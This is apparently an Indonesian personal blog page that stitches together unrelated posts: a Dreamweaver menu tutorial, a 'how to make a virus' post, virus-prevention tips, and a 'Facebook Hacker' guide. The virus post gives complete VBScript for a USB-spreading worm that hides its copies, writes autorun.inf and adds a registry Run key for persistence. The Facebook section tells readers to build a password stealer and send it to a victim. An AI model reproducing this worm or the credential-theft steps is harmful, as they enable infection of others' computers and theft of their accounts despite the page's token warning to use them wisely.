Kamis, 24 November 2011

untuk luar negri bisa ni cara main dream weaver baca n copy jg blh kok

How to use Dreamweaver Menu extension

Vista Buttons wasn't developed as Dreamweaver extension,BUT you can use it as standard Javascript files. To install the menuinto your html page you should do the following things:

1). Create and save your buttons in any temp folder using Vista Buttons application. It will be better to export all menu code to external .js file. Go to "Tools/Export options...". Check "Save all menu params to js file" option.

You can use "Save as HTML" function.

You can enter any name you like, for example enter "menu":

So you'll have menu.html file and "menu-files" folder with all menu files.

2). You can add javascript drop down menu to a single page or to many pages using library or Dynamic Web Template so that you won't have to add it into each page separately.

B.INDONESIA
Cara menggunakan Dreamweaver ekstensi menu

Tombol Vista tidak dikembangkan sebagai ekstensi Dreamweaver, NAMUN Anda dapat menggunakannya sebagai file standar Javascript. Untuk menginstal menuinto halaman html Anda Anda harus melakukan hal-hal berikut:

1). Membuat dan menyimpan tombol Anda dalam folder temp menggunakan Vista Tombol aplikasi. Ini akan lebih baik untuk ekspor semua kode menu untuk eksternal. File js. Pergi ke "Tools / pilihan Ekspor ...". Periksa "Simpan semua params menu untuk Js file" pilihan.

Anda dapat menggunakan "Simpan sebagai HTML" fungsi.

Anda dapat memasukkan nama yang Anda sukai, misalnya masukkan "menu":

Jadi Anda akan memiliki file menu.html dan "menu file" folder dengan semua file menu.

2). Anda dapat menambahkan javascript menu drop-down ke halaman tunggal atau banyak halaman menggunakan perpustakaan atau Template Web Dinamis sehingga Anda tidak perlu menambahkannya ke halaman masing-masing secara terpisah.

Selasa, 22 November 2011

TUTORIAL BUAT VIRUS N ANTIVIRUSNYA

GUNAKAN UNTUK BELAJAR DENGAN BAIK
JANGAN SAMPE DIGUNAKAN YANG TIDAK SEWAJARNYA/MERUSAK/MERUGIKAN ORANG LAIN
TUTORIAAL INI SEMOGA TIDAK ADA YANG DIRUGIKAN

Mungkin anda sudah mengenal apa itu virus VBS, Virus VBS adalah virus sederhana menggunakan bahasa Program (Visual Basic) yang bisa merusak dari tingkat kerusakan rendah sampai tinggi. Virus ini hanya bermodalkan pengetahuan akan bahasa Program dan aplikasi Notepad. Berikut adalah cara pembuatannya:

1. Buka Notepad

2. Copy dan Paste skript Berikut:

------------------------------Skript------------------------------
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&"MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by Zeke Hack"
rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
---------------------------akhir skript---------------------------

3. Save as, ubah save as type menjadi "all files", simpan dengan format ".vbs", misal Hx.vbs.

Virus ini dapat menggandakan sendiri pada semua Direktori termasuk Flash Disk.
__________________________________________________________________
----Gunakanlah Tutorial Dengan Bijak----


mencegah viruses masuk ke komputer qt
ini
Langkah-langkahnya simpelnya sebagai berikut :


- Pada folder c:\windows dan c:\windows\system32 untuk semua file yang ber-ekstensi *.exe dan *.com bisa di "Read Only", yang bertujuan agar tidak dapat diediting/dirubah oleh virus.

- My Computer Klik kanan --> Propertise --> System Restore --> Centang : Turn Of System Restore On All Drives

- Disable Autorun
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer --> NoDriveTypeAutoRun ( ganti dengan FF )


- Disable Autorun/Autoplay melalui Group Policy [GPEDIT.MCS], caranya:


Klik menu + Start

Klik Run

Ketik : GPEDIT.MSC

Setelah muncul layar “Group Policy” klik folder “System” pada menu “User Configuration” dan “Computer Configuration”

Pada kolom Settings, klik dua kali “Turn off Autoplay”

Setelah muncul layar “Turn off Autoplay” properties, klik tabulasi [Settings] dan pilih opsi “Enable” pada menu “Turn off Autoplay” kemudian Pilih “All Drive” pada kolom “Turn off Autoplay on”

- Bisa menggunakan Register Monitoring, untuk mengontrol setiap saat perubahan pada register yang dikehendaki maupun tidak ( seperti : scotty dll )
#
hey lol che

TUTORIAL
STEP 1: First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework
STEP 2: DOWNLOAD the Facebook Hacker by Clicking Here!
STEP 3: Extract the downloaded “Facebook Hacker” file using Winrar. (If you don’t have it then you can GET IT HERE)
STEP 4: Open “Facebook Hacker.exe” file.


STEP 5: After opening the “Facebook Hacker.exe” file build your password stealer as shown in the image below:
Click on the image to Enlarge it.
STEP 6: Now a new file will be created in the same directory with the name you provided while building (eg. server.exe). Just send the file you created to the victim and if the victim runs this file….W00t….you will get his Facebook account’s username and password to your fake email ID which you provided while building the file.

function showads() {
return ‘
‘;
}
add_shortcode(‘adsense’, ‘showads’);

segenap he'cker di se indonesia
tutorial kami
dikembangkan oleh anak he'ckers se indonesia
yogyakarta pun ikut serta lho coooyyy
ayo yg mengaku anak IT /HE'CKERS cb ya ma dap
ayo cb dan praktrikan
ini yang telah saya pelajari
sekian dan terima kasih

Daftar Blog Saya

Total Tayangan Halaman